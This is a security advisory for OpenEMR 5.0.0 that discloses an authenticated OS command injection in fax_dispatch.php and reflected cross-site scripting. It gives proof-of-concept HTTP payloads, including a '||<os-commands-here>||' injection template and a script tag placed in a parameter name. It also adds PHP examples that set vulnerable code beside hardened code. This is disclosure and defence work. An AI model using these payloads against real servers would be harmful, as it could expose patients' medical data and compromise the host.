Vendor description:
-------------------
"OpenEMR is the most popular open source electronic health records and medical
practice management solution. ONC certified with international usage,
OpenEMR's goal is a superior alternative to its proprietary counterparts."

Source: http://www.open-emr.org/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker can
fully compromise the web server on which OpenEMR is installed. Potentially
sensitive health care and medical data might get exposed through this attack.

SEC Consult recommends not to attach OpenEMR to the network until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1. OS Command Injection

Arbitrary OS commands can be injected by an authenticated attacker with any
role. This is a serious vulnerability, as the chance of the system being fully
compromised is very high.

2. Reflected Cross Site Scripting

This vulnerability allows an attacker to inject malicious client-side script
which is executed in the browser of users who visit the manipulated site.
Different issues affect various components. The flash component has not been
fixed yet, as OpenEMR is looking for a replacement component.


Proof of concept:
-----------------
1. OS Command Injection

The following HTTP request executes arbitrary OS commands through
"fax_dispatch.php". The injection point is the form_filename parameter, whose
value reaches an OS command unsanitized:

```
URL     : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=x
METHOD  : POST
PAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_filename='||<os-commands-here>||'&form_pid=1
```

2. Reflected Cross Site Scripting

The following URL parameters have been identified as vulnerable to reflected
cross-site scripting. The payload shows a simple alert message box:

a)
```
URL     : http://$DOMAIN/library/openflashchart/open-flash-chart.swf
METHOD  : GET
PAYLOAD : [PoC removed as no fix is available]
```

b)
```
URL     : http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.php
METHOD  : POST
PAYLOAD : <script>alert('xss');</script>=SENDF
```

Note that in case b) the parameter name itself carries the payload, not the
parameter value.


Vulnerable / tested versions:
-----------------------------
OpenEMR version 5.0.0 has been tested. This version was the latest at the time
the security vulnerability was discovered.
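The following PHP example is added here to illustrate the OS command injection
class documented above and how the form_filename parameter should be handled.
It is not OpenEMR's code: the advisory does not show how fax_dispatch.php builds
its command, so the single-quoted string interpolation, the cat|base64 command,
the /var/faxcache directory and all function names are assumptions chosen to
match the '||<os-commands-here>||' payload shape. Commands are only built, never
executed.

```php
<?php
// Added example, not OpenEMR's code. The vulnerable command shape, the
// cat|base64 command and FAXCACHE are assumptions matching the advisory's
// '||<cmd>||' payload; how fax_dispatch.php really builds its command is not
// documented in the advisory.
declare(strict_types=1);

const FAXCACHE = '/var/faxcache'; // assumed location, illustration only

// Vulnerable: the request parameter is interpolated into a shell command
// between single quotes, so a value starting with ' closes the argument.
function buildCommandVulnerable(string $formFilename): string
{
    return "cat '" . FAXCACHE . "/" . $formFilename . "' | base64";
}

// Hardened, two layers:
//  1. allow-list the name (no path separators, no shell metacharacters,
//     no leading dot, bounded length) and reject everything else;
//  2. pass what remains through escapeshellarg(), so the shell always sees
//     exactly one argument regardless of its content.
function validateFilename(string $formFilename): ?string
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/', $formFilename)) {
        return null;
    }
    return basename($formFilename); // second barrier against traversal
}

function buildCommandHardened(string $formFilename): ?string
{
    $name = validateFilename($formFilename);
    if ($name === null) {
        return null; // caller must answer with an error and not execute
    }
    return 'cat ' . escapeshellarg(FAXCACHE . '/' . $name) . ' | base64';
}

// Demonstration with the advisory's payload shape, "id" standing in for the
// attacker's commands (constructed input).
$poc = "'||id||'";

// The vulnerable string becomes:  cat '/var/faxcache/'||id||'' | base64
// The shell tokenizes it as:      cat '/var/faxcache/' || id || '' | base64
// cat fails on a directory, so the || operator hands control to "id".
echo "vulnerable: " . buildCommandVulnerable($poc) . PHP_EOL;

// The hardened builder rejects the value outright (quote and | are not in
// the allow-list); a legitimate name passes and is quoted as one argument.
$hard = buildCommandHardened($poc);
echo "hardened:   " . ($hard ?? 'rejected by validateFilename()') . PHP_EOL;
echo "hardened:   " . buildCommandHardened('fax1234.pdf') . PHP_EOL;
```

escapeshellarg() alone would already neutralise this payload, but the
allow-list is what keeps a later refactoring (or a second call site that
forgets to escape) from reintroducing the bug; rejecting unexpected names is
also the right behaviour for a parameter that should only ever name a file in
the fax cache. Where the PHP version allows it, avoiding the shell entirely
(proc_open() with an array command, available since PHP 7.4) removes the
parsing step the payload abuses.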
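For case b) of the reflected cross-site scripting, here is an added PHP example
that models a "show posted data" sample page with the vulnerable and the
hardened rendering side by side. It is not the CKEditor sample's or OpenEMR's
code: the function names and the table markup are assumptions, and the input is
the advisory's payload, constructed inline.

```php
<?php
// Added example, not code from OpenEMR or CKEditor. It models a sample page
// that echoes posted form data; names and markup are assumed for
// illustration.
declare(strict_types=1);

// Vulnerable: values are encoded, but the parameter NAME is written out raw.
// A field named "<script>alert('xss');</script>" therefore executes.
function renderPostedDataVulnerable(array $post): string
{
    $html = "<table>\n";
    foreach ($post as $key => $value) {
        if (!is_string($key) || !is_scalar($value)) {
            continue;
        }
        $html .= "<tr><th>" . $key . "</th><td>"
               . htmlspecialchars((string) $value) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened: every attacker-controlled string that lands in HTML is encoded,
// keys included, with ENT_QUOTES so a single quote cannot close an attribute
// and an explicit charset so encoding ambiguities cannot be exploited.
function encodeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderPostedDataHardened(array $post): string
{
    $html = "<table>\n";
    foreach ($post as $key => $value) {
        if (!is_string($key) || !is_scalar($value)) {
            continue;
        }
        $html .= "<tr><th>" . encodeHtml($key) . "</th><td>"
               . encodeHtml((string) $value) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Constructed input mirroring the advisory PoC: the body
// "<script>alert('xss');</script>=SENDF" parses as name => "SENDF".
$posted = ["<script>alert('xss');</script>" => "SENDF"];

header('Content-Type: text/html; charset=UTF-8');
echo renderPostedDataVulnerable($posted);  // script tag survives verbatim
echo renderPostedDataHardened($posted);    // rendered as inert text
```

The difference between the two renderers is a single missing encoding call on
the key, which is the kind of gap an input-value-only audit misses. Encoding
the page is a local fix; editor and library sample directories of this kind
have no business on a production server and are better removed from the
deployment altogether.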